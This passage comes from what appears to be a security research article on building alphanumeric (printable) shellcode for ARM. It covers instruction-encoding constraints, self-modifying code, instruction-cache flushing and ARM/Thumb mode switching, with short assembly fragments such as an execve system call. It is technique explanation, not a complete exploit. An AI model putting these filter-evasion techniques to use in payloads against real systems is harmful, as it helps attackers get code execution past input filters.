instructions that we have disqualified based on whether or not they have bit patterns which are incompatible with alphanumeric characters. This leaves us with 18 instructions, as listed in the reference manual: B/BL, CDP, EOR, LDC, LDM(1), LDM(2), LDR, LDRB, LDRBT, LDRT, MCR, MRC, RSB, STM(2), STRB, STRBT, SUB, SWI. There are a few instructions listed here that are of limited use to us though: - B/BL: the Branch instruction is of limited use to us in most cases: the last 24 bits of this instruction are taken and then shifted left two positions (because instructions must always start at a multiple of 4). The result is then added to the program counter and execution will then continue at that location. To make this offset alphanumeric, we would have to jump at least 12MB from our current location, this limits the usefulness of this instruction since we will not always be able to control memory that is at least 12MB from our shellcode. - CDP: is used to tell the coprocessor to do some kind of data processing. Since we can not be sure about which coprocessors may be available or not on a specific platform, we discard this instruction as well. - LDC: the load coprocessor instruction loads data from a consecutive range of memory addresses into a coprocessor. - MCR/MRC: move to and from coprocessor register to and from ARM registers. While this instruction could be useful for caching purposes (more on this later), it is a privileged instruction before ARMv6. We are now left with 13 instructions: EOR, LDM(1), LDM(2), LDR, LDRB, LDRBT, LDRT, RSB, STM, STRB, STRBT, SUB, SWI. We now group together the instructions that have the same basic functionality but that only differ in the details. For instance, LDR loads a word from memory into a register whereas LDRB loads a byte into the least significant bytes of a register. We get the following: - EOR: Exclusive OR - LDM (LDM(1), LDM(2)): Load multiple registers from a consecutive memory locations - LDR (LDR, LDRB, LDRBT, LDRT): Load value from memory into a register - STM: Store multiple registers to consecutive memory locations - STR (STRB, STRBT): Store a register to memory - SUB (SUB, RSB): Subtract - SWI: Software Interrupt a.k.a. do a system call Unfortunately, the instructions in the above list are not always alphanumeric. Depending on which operands are used, these functions may still generate non-alphanumeric characters. Hence, some additional constraints must be specified for each function. Below, we discuss these constraints for the instructions in the groups. - EOR: Syntax: EOR{<cond>}{S} <Rd>, <Rn>, <shifter_operand> 31 28 27 26 25 24 23 22 21 20 19 16 15 12 11 0 +-----+--+--+--+--+--+--+--+--+-----+-----+-------------------+ |cond | 0| 0| I| 0| 0| 0| 1| S| Rn | Rd | shifter_operand | +-----+--+--+--+--+--+--+--+--+-----+-----+-------------------+ In order for the second byte to be alphanumeric, the S bit must be set to 1. If this bit is set to 0, the resulting value would be less than 47, which is not alphanumeric. Rn can also not be a register higher than R9. Since Rd is encoded in the first four bits of the third byte, it may not start with a 1. This means that only the low registers can be used. In addition, register R0 to R2 can not be used, because this would generate a byte that is too low to be alphanumeric. The shifter operand must be tweaked, such that its most significant four bytes generate valid alphanumeric characters in combination with Rd. The eight least significant bits are, of course, also significant as they fully determine the fourth byte of the instruction. Details about the shifter operand can be found in the ARM architecture reference manual. - LDM(1): Syntax: LDM{<cond>}<addressing_mode> <Rn>{!}, <registers> 31 28 27 26 25 24 23 22 21 20 19 16 15 0 +-----+--+--+--+--+--+--+--+--+------+---------------+ |cond | 1| 0| 0| P| U| 0| W| 1| Rn | register list | +-----+--+--+--+--+--+--+--+--+------+---------------+ LDM(2): Syntax: LDM{<cond>}<addressing_mode> <Rn>, <registers_without_pc>^ 31 28 27 26 25 24 23 22 21 20 19 16 15 14 0 +-----+--+--+--+--+--+--+--+--+------+--+---------------+ |cond | 1| 0| 0| P| U| 1| 0| 1| Rn | 0| register list | +-----+--+--+--+--+--+--+--+--+------+------------------+ The list of registers that is loaded into memory is stored in the last two bytes of the instructions. As a result, not any list of registers can be used. In particular, for the low registers, R7 can never be used. R6 or R5 must be used, and if R6 is not used, R4 must be used. The same goes for the high registers. Additionally, the U bit must be set to 0 and the W bit to 1, to ensure that the second byte of the instruction is alphanumeric. For Rn, registers R0 to R9 can be used with LDM(1), and R0 to R10 can be used with LDM(2). - LDR: Syntax: LDR{<cond>} <Rd>, <addressing_mode> 31 28 27 26 25 24 23 22 21 20 19 16 15 12 11 0 +-----+--+--+--+--+--+--+--+--+-----+-----+-------------+ |cond | 0| 1| I| P| U| 0| W| 1| Rn | Rd | addr_mode | +-----+--+--+--+--+--+--+--+--+-----+-----+-------------+ LDRB: Syntax: LDR{<cond>}B <Rd>, <addressing_mode> 31 28 27 26 25 24 23 22 21 20 19 16 15 12 11 0 +-----+--+--+--+--+--+--+--+--+-----+-----+-------------+ |cond | 0| 1| I| P| U| 1| W| 1| Rn | Rd | addr_mode | +-----+--+--+--+--+--+--+--+--+-----+-----+-------------+ LDRBT: Syntax: LDR{<cond>}BT <Rd>, <post_indexed_addressing_mode> 31 28 27 26 25 24 23 22 21 20 19 16 15 12 11 0 +-----+--+--+--+--+--+--+--+--+-----+-----+-------------+ |cond | 0| 1| I| 0| U| 1| 1| 1| Rn | Rd | addr_mode | +-----+--+--+--+--+--+--+--+--+-----+-----+-------------+ LDRT: Syntax: LDR{<cond>}T <Rd>, <post_indexed_addressing_mode> 31 28 27 26 25 24 23 22 21 20 19 16 15 12 11 0 +-----+--+--+--+--+--+--+--+--+-----+-----+-------------+ |cond | 0| 1| I| 0| U| 0| 1| 1| Rn | Rd | addr_mode | +-----+--+--+--+--+--+--+--+--+-----+-----+-------------+ The details of the addressing mode are described in the ARM reference manual and will not be repeated here for brevity's sake. However, the addressing mode must be specified in a way such that the fourth byte of the instruction is alphanumeric, and the least significant four bits of the third byte generate a valid character in combination with Rd. Rd cannot be one of the high registers, and cannot be R0-R2. The U bit must also be 0. - STM: Syntax: STM{<cond>}<addressing_mode> <Rn>, <registers>^ 31 28 27 26 25 24 23 22 21 20 19 16 15 0 +-----+--+--+--+--+--+--+--+--+------+---------------+ |cond | 1| 0| 0| P| U| 1| 0| 0| Rn | register list | +-----+--+--+--+--+--+--+--+--+------+---------------+ STRB: Syntax: STR{<cond>}B <Rd>, <addressing_mode> 31 28 27 26 25 24 23 22 21 20 19 16 15 12 11 0 +-----+--+--+--+--+--+--+--+--+-----+-----+-------------+ |cond | 0| 1| I| P| U| 1| W| 0| Rn | Rd | addr_mode | +-----+--+--+--+--+--+--+--+--+-----+-----+-------------+ STRBT: Syntax: STR{<cond>}BT <Rd>, <post_indexed_addressing_mode> 31 28 27 26 25 24 23 22 21 20 19 16 15 12 11 0 +-----+--+--+--+--+--+--+--+--+-----+-----+-------------+ |cond | 0| 1| I| 0| U| 1| 1| 0| Rn | Rd | addr_mode | +-----+--+--+--+--+--+--+--+--+-----+-----+-------------+ The structure of STM is very similar to the structure of the LDM operation, and the structure of STRB(T) is very similar to LDRB(T). Hence, comparable constraints apply. The only difference is that other values for Rn must be used in order to generate an alphanumeric character for the third byte of the instruction. - SUB: Syntax: SUB{<cond>}{S} <Rd>, <Rn>, <shifter_operand> 31 28 27 26 25 24 23 22 21 20 19 16 15 12 11 0 +-----+--+--+--+--+--+--+--+--+-----+-----+-------------------+ |cond | 0| 0| I| 0| 0| 1| 0| S| Rn | Rd | shifter_operand | +-----+--+--+--+--+--+--+--+--+-----+-----+-------------------+ RSB: Syntax: RSB{<cond>}{S} <Rd>, <Rn>, <shifter_operand> 31 28 27 26 25 24 23 22 21 20 19 16 15 12 11 0 +-----+--+--+--+--+--+--+--+--+-----+-----+-------------------+ |cond | 0| 0| I| 0| 0| 1| 1| S| Rn | Rd | shifter_operand | +-----+--+--+--+--+--+--+--+--+-----+-----+-------------------+ To get the second byte of the instruction to be alphanumeric, Rn and the S bit must be set accordingly. In addition, Rd cannot be one of the high registers, or R0-R2. As with the previous instructions, we refer you to the ARM architecture reference manual for a detailed instruction of the shifter operand. - SWI: Syntax: SWI{<cond>} <immed_24> 31 28 27 26 25 24 23 0 +-----+--+--+--+--+----------------------------+ |cond | 1| 1| 1| 1| immed_24 | +-----+--+--+--+--+----------------------------+ As will become clear further in the article, it was essential for us that the first byte of the SWI call is alphanumeric. Fortunately, this can be accomplished by using one of the condition codes discussed in the previous section. The other three bytes are fully determined by the immediate value that is passed as the operand of the SWI instruction. ----[ 2.4 Getting a known value in a register When our shellcode starts executing, we are faced with a problem: We do not know which values the registers contain. So we must place our own value in a register, however we don't have any traditional instructions for doing this. We can't use MOV because that is not alphanumeric. So we must make do with our remaining instructions. If we look at our arithmetic instructions, we can't EOR or SUB a register with/from itself to get a 0 into a register as using 3 registers as arguments is not alphanumeric. We could EOR or SUB with an immediate, but we don't know the values in the registers so we can't give an appropriate immediate which will return the expected value. Given that these are our only arithmetic instructions, we can't arithmetically get a known value into a register. So our approach has been to use LDR. Since we know which code we're writing, we can use our shellcode as data and load a byte from the shellcode into a register. This is done as follows: SUB r3, pc, #48 LDRB r3, [r3, #-48] PC will always point to our shellcode, however we can't directly access it in an LDR instruction as this would result in non-alphanumeric code. So we copy PC to R3 by subtracting 48 from PC. Then we use R3 in our LDRB instruction to load a known byte from our shellcode into R3 (we use an immediate offset to ensure that the last byte of the instruction is alphanumeric). Once this is done we can use R3 as the base register for loading values into other registers. Subtracting 48 from R3 will give us 0, subtracting 49 will give us -1, performing an exclusing or with a known value will give us another known value, etc. ----[ 2.5 Writing to R0-R2 One of the constraints, mentioned in section 2.3 on most functions that have an Rd operand, is that registers R0 to R2 cannot be used as destination register. The reason is that the destination register is encoded in the four most significant bits of the third byte of an operation. If these bits are set to the value 0, 1 or 2, this would generate a byte that is not alphanumerical. On ARM processors, registers R0 to R3 are used to transfer parameters to function calls. If the function has more than 4 parameters, the additional parameters are pushed to the stack. This poses a problem for us, because we will need to populate registers R0 to R3 in our shellcode, in order to pass arguments to functions and system calls. However, it's not easy to write to the contents of these registers, because most operations do not support having R0-R2 as a destination register. There is, however, one operation that we can use to write to the three lowest registers, without generating non-alphanumeric instructions. The LDM instruction loads values from the stack into multiple registers. It encodes the list of registers it needs to write to in the last two bytes of the instruction. Hence, if bits 0 to 2 are set, registers R0 to R2 will be used to write data to. In order to get the bytes of the instruction to become alphanumeric, we have to add some other registers to the list. In the example shellcode, we will use registers R3 to R7 to do our calculations, store the results to the stack, and then load the results in R0 to R2 with the LDM instruction. Thumb mode doesn't suffer from this problem, because the resulting register is encoded differently. ----[ 2.6 Self-modifying Code With the instructions that remain after discarding all non-alphanumeric bytes, it's pretty hard to write interesting shellcode. There's only limited support for arithmetic operations, which makes it difficult to do the calculations that are necessary to make system calls. In addition, there's no branch instruction either, making loops impossible. So it seems that we are not even Turing complete. An interesting option would be to switch from the ARM to the Thumb instruction set. Since thumb instructions are shorter, it is likely that more instructions are available for this instruction set. However, in order to go from ARM to Thumb mode, we need the BX instruction, which executes a branch and an optional exchange of processor state. This instruction is, however, not alphanumeric. Another possibility is to write self-modifying code. The basic idea is to compute and write non-alphanumeric instructions to memory, using only alphanumeric instructions. Then, when the desired code is written in memory, simply jump to the instructions to execute them. Let's take a look at an example. To keep this simple, we consider here non-alphanumeric shellcode. Only null bytes are not allowed. Imagine you want to execute the instruction: mov r0, #0 The resulting bytes for this instruction are 0xe3a00000. Since there are two null bytes in this instruction, we will either need another instruction or self-modifying code. In this example, we will use self-modifying code: ldrh r1, [pc, #6] eor r1, #384 strh r1, [pc, #-2] .byte 0xe3, 0xa0, 0x80, 0x01 In this short code fragment, we load the 0x80 and 0x01 bytes in register R1, we XOR them with 384 (which results in the value 0), and we store the result back over the original instruction. This code has no null bytes in it anymore. ----[ 2.7 The Instruction Cache ARM processors have an instruction cache which makes writing self-modifying code hard to do since all the instructions that are being executed will most likely already have been cached. The Intel architecture has a specific requirement to be compatible with self-modifying code and as such, will make sure that when code is modified in memory the cache that possibly contains those instructions is invalidated. ARM has no such requirement, which means that the instructions that have been modified in memory could be different from the instructions that are actually executed since they could have been cached. Given the size of the instruction cache (16kb on our processor), and the proximity of the modified instructions it is very hard to write self-modifying shellcode without having to flush the instruction cache. One way of ensuring that we can bypass the instruction cache is to use the MCR instruction, which allows us to move a register to the system coprocessor and is alphanumeric. We can set a specific bit in a register and then move that register to the status register of the system coprocessor, allowing us to turn off the instruction cache. However, as we mentioned in section 2.3, this instruction is privileged before ARMv6. Because it is not usable in all shellcode as such, we will not discuss it. These cache issues and the fact that we can't just turn off the cache are the reasons why the fact that the SWI instruction can be represented alphanumerically was essential: we can't modify the SWI instruction in memory before flushing the cache, but we will need this instruction to perform a flush of the instruction cache. On ARM/Linux, the system call for a cache flush is 0x9F0002. None of these bytes are alphanumeric and since they are issued as part of an instruction this could result in a problem for our self-modifying code. However, SWI generates a software interrupt and to the interrupt handler, 0x9F0002 is actually data and as a result will not be read via the instruction cache, so if we modify the argument to SWI in our self-modifyign code, the argument will be read correctly. In non-alphanumeric code, we would flush the instruction cache with this sequence of operations: mov r0, #0 mov r1, #-1 mov r2, #0 swi 0x9F0002 Since these instructions generate a number of non-alphanumeric characters, we will need self-modifying code techniques to use this in the shellcode. ----[ 2.8 Going to Thumb Mode As discussed in section 1.5, we don't need to go into Thumb mode to make our shellcode work, but it is more convenient since we only need to make 2 bytes alphanumeric per instruction rather than 4. Below is an example that will get us into Thumb mode: sub r6, pc, #-1 bx r6 However, the BX instruction is not alphanumeric, so we must overwrite our shellcode to execute the correct instruction. We must modify this instruction before executing the system call to flush the instruction cache. Below is the list of Thumb instructions and their constraints with respect to processor version and if it's possible to display them alphanumerically. +-------------+---------+--------------+ | instruction | version | disqualifier | +-------------+---------+--------------+ | ADC | | | | ADD (1) | | IZ:14-13 | | ADD (2) | | | | ADD (3) | | IZ:14-13 | | ADD (4) | | | | ADD (5) | | IO: 15 | | ADD (6) | | IO: 15 | | ADD (7) | | IO: 15 | | AND | | Pattern is @ | | ASR (1) | | IZ:14-13 | | ASR (2) | | | | B (1) | | IO:15 | | B (2) | | IO:15 | | BIC | | IO:7 | | BKPT | 5T+ | IO:15 | | BL | | IO:15 | | BLX (1) | 5T+ | IO:15 | | BLX (2) | 5T+ | IO:7 | | BX | | | | CMN | | IO:7 | | CMP (1) | | | | CMP (2) | | IO:7 | | CMP (3) | | | | CPS | 6+ | IO:7 | | CPY | 6+ | | | EOR | | Pattern is @ | | LDMIA | | IO:15 | | LDR (1) | | | | LDR (2) | | | | LDR (3) | | | | LDR (4) | | IO:15 | | LDRB (1) | | | | LDRB (2) | | | | LDRH (1) | | IO:15 | | LDRH (2) | | | | LDRSB | | | | LDRSH | | | | LSL (1) | | IZ: 14-13 | | LSL (2) | | IO: 7 | | LSR (1) | | IZ: 14-13 | | LSR (2) | | IO: 7 | | MOV (1) | | IZ: 14,12 | | MOV (2) | | IZ: 14-13 | | MOV (3) | | | | MUL | | | | MVN | | IO:7 | | NEG | | | | ORR | | | | POP | | IO:15 | | PUSH | | IO:15 | | REV | 6+ | IO:15 | | REV16 | 6+ | IO:15 | | REVSH | 6+ | IO:15 | | ROR | | IO:7 | | SBC | | IO:7 | | SETEND | 6+ | IO:15 | | STMIA | | IO:15 | | STR (1) | | | | STR (2) | | | | STR (3) | | IO:15 | | STRB (1) | | | | STRB (2) | | | | STRH (1) | | IO:15 | | STRH (2) | | | | SUB (1) | | IZ: 14-13 | | SUB (2) | | | | SUB (3) | | IZ: 14-13 | | SUB (4) | | IZ:15 | | SWI | | IZ:15 | | SXTB | 6+ | IZ:15 | | SXTH | 6+ | IZ:15 | | TST | | | | UXTB | 6+ | IZ:15 | | UXTH | 6+ | IZ:15 | +-------------+---------+--------------+ If we remove instructions which are not available on all ARM architectures, can not be represented alphanumerically or require special hardware, and then group together the instructions with similar purposes, we get the following list of instructions - ADC: Add with Cary - ADD: Add - ASR: Arithmetic Shift Right - BX: Branch and Exchange - CMP: Compare - LDR: Load Register - MOV: Move - MUL: Multiply - NEG: Negate - ORR: Logical Or - STR: Store Register - SUB: Substract - TST: Test As you can see we have a lot more instructions available in Thumb mode than we did in ARM mode. However there are many constraints on the use of these instructions. For every instruction we can only use specific registers or specific values. The constraints here are more esoteric than they are for ARM because of the limited size of instructions. We will go over each instructions and its limitations. - ADC: Syntax: ADC <Rd>, <Rm> 15 14 13 12 11 10 9 8 7 6 5 3 2 0 +--+--+--+--+--+--+--+--+--+--+-----+-----+ | 0| 1| 0| 0| 0| 0| 0| 1| 0| 1| Rm | Rd | +--+--+--+--+--+--+--+--+-----+-----+-----+ Since bit 7 is set to 0 and bit 6 is set to one, we can use just about any low register for Rm and Rd, the only combination of registers that we must exclude is the use of R0 as both Rm and Rd since that would result in 0x40 or an '@'. The main problem with this instruction is that we must know the value of the carry flag as it will be added to the result of the addition. - ADD: There are seven versions of the thumb mode ADD instruction listed in the reference manual. We will refer to them as the reference manual does, i.e. ADD (1) to ADD (7). ADD (1), ADD (3), ADD (5), ADD (6) and ADD (7) can not be used because their first byte is not alphanumeric. This leaves us with: - ADD (2): add a constant value to a register Syntax: ADD <Rd>, #<imm_8> 15 14 13 12 11 10 8 7 0 +--+--+--+--+--+-----+---------------+ | 0| 0| 1| 1| 0| Rd | imm_8 | +--+--+--+--+--+-----+---------------+ Rd can be any low register but imm_8 must follow the constraints of being alphanumeric: - 47 < imm_8 < 123 - imm_8 is not 58-64 or 91-96. - ADD (4): adds the value of two registers of which one or both must be a high register. Syntax: ADD <Rd>, <Rm> 15 14 13 12 11 10 9 8 7 6 5 3 2 0 +--+--+--+--+--+--+--+--+---+---+-----+-----+ | 0| 1| 0| 0| 0| 1| 0| 0| H1| H2| Rm | Rd | +--+--+--+--+--+--+--+--+---+---+-----+-----+ With H1 = 1 if Rd is a high register and H2 = 1 if Rm is a high register. In our case the destination register, Rd may not be a high register because that would set bit 7 of the instruction to 1. As a result, we can only use this instruction to add the contents of a high register to a low one. However since bit 7 must be 0 and bit 6 must be 1, we can't use register R8 as Rm and R0 as Rd together (i.e. we can't do ADD r0, r8) since that would result in the second byte being an '@'. In theory we could use this instruction to be able to add 2 low registers to each other, since for some registers the encoding would still be alphanumeric, however the reference manual specifies that if both registers are low, then the result is unpredictable. So the behavior may vary from one processor version to the next. - ASR: There are two versions of ASR, ASR (1) and (2) respectively. ASR (1) allows the shifting of a register by a constant, however this is not alphanumeric. So we must use the second version of this instruction, ASR (2), which shifts a register based on the value in another register. Syntax: ASR <Rd>, <RS> 15 14 13 12 11 10 9 8 7 6 5 3 2 0 +--+--+--+--+--+--+--+--+--+--+-----+-----+ | 0| 1| 0| 0| 0| 0| 0| 1| 0| 0| Rs | Rd | +--+--+--+--+--+--+--+--+-----+-----+-----+ Since bits 7 and 6 of ASR are 0, the first 2 bits of Rs must be 1. This means that Rs must be either R6 or R7. - BX: Syntax: BX <Rm> 15 14 13 12 11 10 9 8 7 6 5 3 2 0 +--+--+--+--+--+--+--+--+--+---+-----+-----+ | 0| 1| 0| 0| 0| 1| 1| 1| 0| H2| Rm | SBZ | +--+--+--+--+--+--+--+--+--+---+-----+-----+ The branch and exchange instruction can be used to enter ARM mode. This is useful if we have code which starts off in Thumb mode: since SWI is not alphanumeric in Thumb, we can't flush the cache if we write self-modifying code. We can, however use the BX instruction to get into ARM mode, where the SWI instruction is alphanumeric. We discuss this in more detail below. If bit 6 is 0, we must have bits 5 and 4 set to 1, this means that we can only use R6 and R7 from the low registers. For the high registers we can use R9, R10, R11, R13, R14 and R15 - CMP: There are three versions of CMP: CMP (1) to CMP (3). CMP (2) is not alphanumeric. - CMP (1) compares a register to an immediate. Syntax: CMP <Rn>, #<imm_8> 15 14 13 12 11 10 8 7 0 +--+--+--+--+--+-----+---------------+ | 0| 0| 1| 0| 1| Rn | imm_8 | +--+--+--+--+--+-----+---------------+ As with ADD (2), Rn can be any low register but imm_8 must follow the constraints of being alphanumeric: - 47 < imm_8 < 123 - imm_8 is not 58-64 or 91-96. - CMP (3) compares the value of two registers of which one or both must be a high register. Syntax: CMP <Rn>, <Rm> 15 14 13 12 11 10 9 8 7 6 5 3 2 0 +--+--+--+--+--+--+--+--+---+---+-----+-----+ | 0| 1| 0| 0| 0| 1| 0| 1| H1| H2| Rm | Rd | +--+--+--+--+--+--+--+--+---+---+-----+-----+ The same restrictions apply as for ADD. In our case Rn may not be a high register because that would set bit 7 of the instruction to 1. As a result, we can only use this instruction to compare the contents of a high register to a low one. As with ADD, Rm can not be R8 if Rn is R0 and comparing two low registers is unpredictable. - LDR: There are many versions of this instruction: LDR (1) to LDR (4), LDRB (1), LDRB (2), LDRH (1), LDRH (2), LDRSB and LDRSH. Of these, only LDR (4) and LDRH (1) are not alphanumeric. - LDR (1) Loads a word from memory address stored in a register into another register. A word offset of maximum 5 bits (i.e. the value is multiplied by 4) can be given to the register containing the memory address. Syntax: LDR <Rd>, [<Rn>, #<imm_5> * 4] 15 14 13 12 11 10 6 5 3 2 0 +--+--+--+--+--+----------+-----+-----+ | 0| 1| 1| 0| 1| imm_5 | Rn | Rd | +--+--+--+--+--+----------+-----+-----+ The constraints on register use in this case depend on the value of the immediate. However, we can conclude that in no cases can Rn and Rd both be R0 at the same time. If imm_5 is uneven (i.e. bit 6 is set) , then all other registers can be used. However, if imm_5 is even (i.e. bit 6 is not set), then only R6 and R7 can be used as Rn. - LDR (2) does the same as LDR (1) except that the offset to the register containing the memory address to read from is stored in a register and as a result can be larger than 32. Syntax: LDR <Rd>, [<Rn>, <Rm>] 15 14 13 12 11 10 9 8 6 5 3 2 0 +--+--+--+--+--+--+--+-----+-----+-----+ | 0| 1| 0| 1| 1| 0| 0| Rm | Rn | Rd | +--+--+--+--+--+--+--+-----+-----+-----+ Since bit 7 must be 0, Rm is already constrained to registers: R0, R1, R4 and R5. However, if Rm is R0 or R4, then Rn must be R6 or R7. If Rm is R1 or R5 then Rn and Rd can not both be R0. - LDR (3) loads a word into a register based on an 8 bit offset from the program counter (PC). Syntax: LDR <Rd>, [PC, #<imm_8> * 4] 15 14 13 12 11 10 8 7 0 +--+--+--+--+--+-----+---------------+ | 0| 1| 0| 0| 1| Rd | imm_8 | +--+--+--+--+--+-----+---------------+ As with ADD (2) and CMP (1) Rd can be any low register but imm_8 must follow the constraints of being alphanumeric. - LDRB (1) is essentially the same as LDR (1) except that it loads a byte from memory instead of a word. Syntax: LDRB <Rd>, [<Rn>, #<imm_5>] 15 14 13 12 11 10 6 5 3 2 0 +--+--+--+--+--+----------+-----+-----+ | 0| 1| 1| 1| 1| imm_5 | Rn | Rd | +--+--+--+--+--+----------+-----+-----+ Similar restrictions apply, with the added restriction however that imm_5 must be lower than 12, because otherwise the first byte is larger than 'z' (0x7a). However, if imm_5 is 11 or 10, then bit 7 of the second byte will be set to one, so in reality it must be lower than 10 and not equal 7, 6, 2 or 3. - LDRB (2) is the same as LDR (2) except that it behaves like LDRB (1), i.e. it loads a byte instead of a word. Syntax: LDRB <Rd>, [<Rn>, <Rm>] 15 14 13 12 11 10 9 8 6 5 3 2 0 +--+--+--+--+--+--+--+-----+-----+-----+ | 0| 1| 0| 1| 1| 1| 0| Rm | Rn | Rd | +--+--+--+--+--+--+--+-----+-----+-----+ Since the second byte is identical, the same restrictions as for LDR (2) apply. - LDRH (2) is the same as LDR (2) and LDRB (2), except it loads a halfword (16 bits). Syntax: LDRH <Rd>, [<Rn>, <Rm>] 15 14 13 12 11 10 9 8 6 5 3 2 0 +--+--+--+--+--+--+--+-----+-----+-----+ | 0| 1| 0| 1| 1| 0| 1| Rm | Rn | Rd | +--+--+--+--+--+--+--+-----+-----+-----+ The same restrictions as for LDR (2) and LDRB (2) apply. - LDRSB is the same as LDRB (2), except that it interprets the byte that it loads as signed. Syntax: LDRSB <Rd>, [<Rn>, <Rm>] 15 14 13 12 11 10 9 8 6 5 3 2 0 +--+--+--+--+--+--+--+-----+-----+-----+ | 0| 1| 0| 1| 0| 1| 1| Rm | Rn | Rd | +--+--+--+--+--+--+--+-----+-----+-----+ Again, the same restrictions apply as for LDRB(2). - LDRSH is the halfword equivalent of LDRSB. Syntax: LDRSH <Rd>, [<Rn>, <Rm>] 15 14 13 12 11 10 9 8 6 5 3 2 0 +--+--+--+--+--+--+--+-----+-----+-----+ | 0| 1| 0| 1| 1| 1| 1| Rm | Rn | Rd | +--+--+--+--+--+--+--+-----+-----+-----+ The same restrictions apply as for LDRB(2) and LDRH (2). - MOV: There are three versions of this instrction: MOV (1) to MOV (3), but only MOV (3) is alphanumeric. MOV (3) moves to, from or between high registers. Syntax: MOV <Rd>, <Rm> 15 14 13 12 11 10 9 8 7 6 5 3 2 0 +--+--+--+--+--+--+--+--+---+---+-----+-----+ | 0| 1| 0| 0| 0| 1| 1| 0| H1| H2| Rm | Rd | +--+--+--+--+--+--+--+--+---+---+-----+-----+ As with other instructions (ADD and CMP) that operate on high registers, Rd can not be R0 if Rm is R8 and using two low registers is unpredictable. - MUL: Syntax: MUL <Rd>, <Rm> 15 14 13 12 11 10 9 8 7 6 5 3 2 0 +--+--+--+--+--+--+--+--+--+--+-----+-----+ | 0| 1| 0| 0| 0| 0| 1| 1| 0| 1| Rm | Rd | +--+--+--+--+--+--+--+--+--+--+-----+-----+ Since the second byte of MUL is identical to the second byte of the ADC instruction, it has the same limitations. I.e. the only limitation on registers is that we can't use R0 as both Rm and Rd, all other combinations with low registers are valid. - NEG: Syntax: NEG <Rd>, <Rm> 15 14 13 12 11 10 9 8 7 6 5 3 2 0 +--+--+--+--+--+--+--+--+--+--+-----+-----+ | 0| 1| 0| 0| 0| 0| 1| 0| 0| 1| Rm | Rd | +--+--+--+--+--+--+--+--+--+--+-----+-----+ The second byte of NEG is identical to the second bytes of MUL and ADC, so the same limitations apply. - STR: As with LDR, there are many versions of STR: STR (1) to STR (3), STRB (1) and (2), STRH (1) and (2). However STR (3) and STRH (1) are not alphanumeric. - STR (1) the complementary instruction to LDR (1) stores a word from a register to memory. As with LDR (1), it will take an immediate of 5 bytes that it multiplies by 4 and uses as offset for a base register that contains a memory address to write to. Syntax: STR <Rd>, [<Rn>, #<imm_5> * 4] 15 14 13 12 11 10 6 5 3 2 0 +--+--+--+--+--+----------+-----+-----+ | 0| 1| 1| 0| 0| imm_5 | Rn | Rd | +--+--+--+--+--+----------+-----+-----+ The same limitations as with LDR (1) apply. - STR (2) is the complementary instruction to LDR (2). Syntax: STR <Rd>, [<Rn>, <Rm>] 15 14 13 12 11 10 9 8 6 5 3 2 0 +--+--+--+--+--+--+--+-----+-----+-----+ | 0| 1| 0| 1| 0| 0| 0| Rm | Rn | Rd | +--+--+--+--+--+--+--+-----+-----+-----+ Again, the same limitations as with LDR (2) apply. - STRB (1) is complementary to LDRB (1). Syntax: STRB <Rd>, [<Rn>, #<imm_5>] 15 14 13 12 11 10 6 5 3 2 0 +--+--+--+--+--+----------+-----+-----+ | 0| 1| 1| 1| 0| imm_5 | Rn | Rd | +--+--+--+--+--+----------+-----+-----+ Since bit 11 is 0, the limitations are less stringent than with LDRB (1). As such, the limitations of STR (1) apply rather than the ones of LDRB (1). - STRB (2) is complementary to LDRB (2) Syntax: STRB <Rd>, [<Rn>, <Rm>] 15 14 13 12 11 10 9 8 6 5 3 2 0 +--+--+--+--+--+--+--+-----+-----+-----+ | 0| 1| 0| 1| 0| 1| 0| Rm | Rn | Rd | +--+--+--+--+--+--+--+-----+-----+-----+ The same limitations as with LDRB (2) apply. - STRH (2) is complementary to LDRH (2). Syntax: STRH <Rd>, [<Rn>, <Rm>] 15 14 13 12 11 10 9 8 6 5 3 2 0 +--+--+--+--+--+--+--+-----+-----+-----+ | 0| 1| 0| 1| 0| 0| 1| Rm | Rn | Rd | +--+--+--+--+--+--+--+-----+-----+-----+ The same limitations apply. - SUB: There are four versions of SUB, but only SUB (2) is alphanumeric. Syntax: SUB <Rd>, <imm_8> 15 14 13 12 11 10 8 7 0 +--+--+--+--+--+-----+---------------+ | 0| 0| 1| 1| 1| Rd | imm_8 | +--+--+--+--+--+-----+---------------+ Since the second byte of SUB (2) only contains an immediate, it has the same limitations as the second byte of ADD (2), CMP (1) and LDR(3). However, unlike in ADD (2), CMP (1) and LDR (3), we can't use any register for Rd. Since the first 5 bits of SUB are 00111, this covers a range of 0x38 to 0x3f. However only 0x38 and 0x39 (the characters '8' and '9') are alphanumeric. This means that we can only use registers R0 and R1 as Rd this SUB instruction. - TST: Syntax: TST <Rn>, <Rm> 15 14 13 12 11 10 9 8 7 6 5 3 2 0 +--+--+--+--+--+--+--+--+--+--+-----+-----+ | 0| 1| 0| 0| 0| 0| 1| 0| 0| 0| Rm | Rn | +--+--+--+--+--+--+--+--+--+--+-----+-----+ Since bit 7 and 6 are both set to 0, this means that bits 5 and 4 must be set to 1. This yields the following restrictions: - Rm must be either: R6 or R7. - If Rm is R6, then Rn can be any other low register. - If Rm is R7, then Rn can only be R0 or R1. An important instruction that is missing from the above list is the SWI instruction. To be able to get around the fact that SWI is not alphanumeric in Thumb mode, we overwrite it from ARM mode. However, unlike the SWI in ARM mode, the argument to SWI will not be used to determine the system call number that we want to call. Instead we must place the system call number into R7. Unlike in ARM mode, where we must add 0x900000 to the system call number, we can just place the number in R7 as is. An example of calling execve in ARM mode: SWI 0x90000b In Thumb mode: MOV r7, #0x0b SWI 48 ----[ 2.9 Going to ARM Mode For programs that we wish to exploit that are already running in Thumb mode, we still have a problem: we can't write self-modifying code in Thumb mode because we can't call SWI to perform a cache flush. However, since the BX instruction is alphanumeric in Thumb mode, we can use that instruction to get us into ARM mode where we can do all the cool stuff we've discussed above. Here is an example of a code snippet that gets us into ARM mode: BX pc ADD r7, #50 We need the add instruction as a nop instruction because PC will point to the current instruction + 4. The BX pc instruction will be represented alphanumerically as 'G''x'. --[ 3. Conclusion This article shows that alphanumeric shellcode is realistic on the ARM processor, even though it is harder to generate because of the nature of the ARM processor. Any operation, including non-alphanumeric instructions, can be executed by writing self-modifying code and flushing the instruction cache. Consequently, alphanumeric shellcode is Turing complete. The thumb instruction set can be used, if available, to facilitate writing shellcode. Its denser instruction structure makes it somewhat easier to make it generate alphanumeric bytes. However, having access to the thumb instruction set is not required. --[ 4. Acknowledgements The authors would like to thank Frank Piessens, tetsuki and tohomo for their contributions to the project which resulted in this article. We would also like to thank HD Moore for his helpful suggestions when we were trying to make our shellcode printable. Shoutouts to the people from nologin/uninformed: arachne, bugcheck, dragorn, gamma, h1kari, hdm, icer, 